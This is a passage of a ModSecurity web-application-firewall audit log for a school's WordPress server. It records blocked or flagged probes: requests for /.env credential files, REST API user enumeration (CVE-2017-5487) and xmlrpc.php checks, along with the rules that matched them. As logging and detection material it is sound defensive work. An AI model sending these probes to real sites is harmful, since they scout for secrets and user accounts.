271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357353545502 3224 (- - -) Stopwatch2: 1746357353545502 3224; combined=1327, p1=486, p2=812, p3=0, p4=0, p5=29, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --325a1131-Z-- --405f6436-A-- [04/May/2025:18:15:58 +0700] aBdMbtsVQyl9V2B8Pt_AbAAAAFI 103.236.140.4 60002 103.236.140.4 8181 --405f6436-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --405f6436-C-- demo.sayHello --405f6436-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --405f6436-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357358115497 5354 (- - -) Stopwatch2: 1746357358115497 5354; combined=4046, p1=496, p2=3272, p3=37, p4=34, p5=122, sr=73, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --405f6436-Z-- --a3c5e140-A-- [04/May/2025:18:16:35 +0700] aBdMk9sVQyl9V2B8Pt_AbwAAAFQ 103.236.140.4 60008 103.236.140.4 8181 --a3c5e140-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3c5e140-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c5e140-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357395796050 3523 (- - -) Stopwatch2: 1746357395796050 3523; combined=1542, p1=498, p2=945, p3=0, p4=0, p5=99, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c5e140-Z-- --5be1d858-A-- [04/May/2025:18:16:43 +0700] aBdMm9sVQyl9V2B8Pt_AcQAAAFg 103.236.140.4 60012 103.236.140.4 8181 --5be1d858-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5be1d858-C-- demo.sayHello --5be1d858-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5be1d858-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357403406022 6347 (- - -) Stopwatch2: 1746357403406022 6347; combined=4635, p1=624, p2=3828, p3=33, p4=36, p5=69, sr=79, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5be1d858-Z-- --217e4a61-A-- [04/May/2025:18:16:48 +0700] aBdMoNsVQyl9V2B8Pt_AcwAAAEE 103.236.140.4 60016 103.236.140.4 8181 --217e4a61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --217e4a61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --217e4a61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357408407132 1991 (- - -) Stopwatch2: 1746357408407132 1991; combined=1032, p1=348, p2=658, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --217e4a61-Z-- --c0305b0a-A-- [04/May/2025:18:16:53 +0700] aBdMpdsVQyl9V2B8Pt_AdAAAAEU 103.236.140.4 60020 103.236.140.4 8181 --c0305b0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.136 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0305b0a-C-- demo.sayHello --c0305b0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0305b0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357413635074 4568 (- - -) Stopwatch2: 1746357413635074 4568; combined=3615, p1=447, p2=2974, p3=22, p4=25, p5=86, sr=88, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0305b0a-Z-- --41397d22-A-- [04/May/2025:18:19:19 +0700] aBdNN9sVQyl9V2B8Pt_AdwAAAE4 103.236.140.4 60034 103.236.140.4 8181 --41397d22-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41397d22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41397d22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357559968395 2906 (- - -) Stopwatch2: 1746357559968395 2906; combined=1255, p1=440, p2=784, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41397d22-Z-- --78c9cb3d-A-- [04/May/2025:18:19:19 +0700] aBdNN9sVQyl9V2B8Pt_AeAAAAEk 103.236.140.4 60036 103.236.140.4 8181 --78c9cb3d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --78c9cb3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78c9cb3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357559973986 2754 (- - -) Stopwatch2: 1746357559973986 2754; combined=1185, p1=403, p2=754, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78c9cb3d-Z-- --c42f6569-A-- [04/May/2025:18:19:25 +0700] aBdNPechPF6irSergtsBywAAANE 103.236.140.4 60042 103.236.140.4 8181 --c42f6569-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c42f6569-C-- demo.sayHello --c42f6569-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c42f6569-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357565305066 5025 (- - -) Stopwatch2: 1746357565305066 5025; combined=3837, p1=486, p2=3149, p3=25, p4=26, p5=89, sr=90, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c42f6569-Z-- --a3c12c36-A-- [04/May/2025:18:19:25 +0700] aBdNPdsVQyl9V2B8Pt_AegAAAEw 103.236.140.4 60044 103.236.140.4 8181 --a3c12c36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3c12c36-C-- demo.sayHello --a3c12c36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c12c36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357565963105 4993 (- - -) Stopwatch2: 1746357565963105 4993; combined=3751, p1=456, p2=3091, p3=21, p4=24, p5=93, sr=76, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c12c36-Z-- --2093b13e-A-- [04/May/2025:18:41:12 +0700] aBdSWPnZiHJYHUAF8QfkbwAAABI 103.236.140.4 60212 103.236.140.4 8181 --2093b13e-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.182.39 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.182.39 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2093b13e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2093b13e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746358872531926 741 (- - -) Stopwatch2: 1746358872531926 741; combined=324, p1=290, p2=0, p3=0, p4=0, p5=34, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2093b13e-Z-- --db0a9f0a-A-- [04/May/2025:19:01:17 +0700] aBdXDWJEE9ao5dcyYWn4hAAAAII 103.236.140.4 32922 103.236.140.4 8181 --db0a9f0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Accept-Charset: utf-8 --db0a9f0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db0a9f0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746360077617269 795 (- - -) Stopwatch2: 1746360077617269 795; combined=325, p1=282, p2=0, p3=0, p4=0, p5=43, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db0a9f0a-Z-- --c99b045a-A-- [04/May/2025:19:01:20 +0700] aBdXENsVQyl9V2B8Pt_AjAAAAFE 103.236.140.4 32924 103.236.140.4 8181 --c99b045a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Nokia 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c99b045a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c99b045a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746360080317129 724 (- - -) Stopwatch2: 1746360080317129 724; combined=313, p1=274, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c99b045a-Z-- --36844004-A-- [04/May/2025:19:28:31 +0700] aBddb2JEE9ao5dcyYWn5HQAAAIc 103.236.140.4 36842 103.236.140.4 8181 --36844004-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36844004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36844004-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746361711298885 2608 (- - -) Stopwatch2: 1746361711298885 2608; combined=1398, p1=441, p2=916, p3=0, p4=0, p5=41, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36844004-Z-- --2034dd3d-A-- [04/May/2025:19:28:39 +0700] aBddd_nZiHJYHUAF8QfmDgAAAAg 103.236.140.4 36854 103.236.140.4 8181 --2034dd3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.60 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2034dd3d-C-- demo.sayHello --2034dd3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2034dd3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746361719372442 5646 (- - -) Stopwatch2: 1746361719372442 5646; combined=4261, p1=506, p2=3533, p3=34, p4=33, p5=91, sr=69, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2034dd3d-Z-- --40441851-A-- [04/May/2025:19:42:10 +0700] aBdgotsVQyl9V2B8Pt_BtQAAAEM 103.236.140.4 37136 103.236.140.4 8181 --40441851-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.16 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --40441851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40441851-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746362530044843 790 (- - -) Stopwatch2: 1746362530044843 790; combined=326, p1=283, p2=0, p3=0, p4=0, p5=43, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40441851-Z-- --d6454c5b-A-- [04/May/2025:19:42:16 +0700] aBdgqGJEE9ao5dcyYWn5ZAAAAIk 103.236.140.4 37182 103.236.140.4 8181 --d6454c5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.16 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d6454c5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6454c5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746362536597083 705 (- - -) Stopwatch2: 1746362536597083 705; combined=314, p1=275, p2=0, p3=0, p4=0, p5=38, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6454c5b-Z-- --6ac43226-A-- [04/May/2025:20:50:40 +0700] aBdwsOchPF6irSergtsEnAAAANE 103.236.140.4 37942 103.236.140.4 8181 --6ac43226-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --6ac43226-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ac43226-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746366640773264 854 (- - -) Stopwatch2: 1746366640773264 854; combined=332, p1=290, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
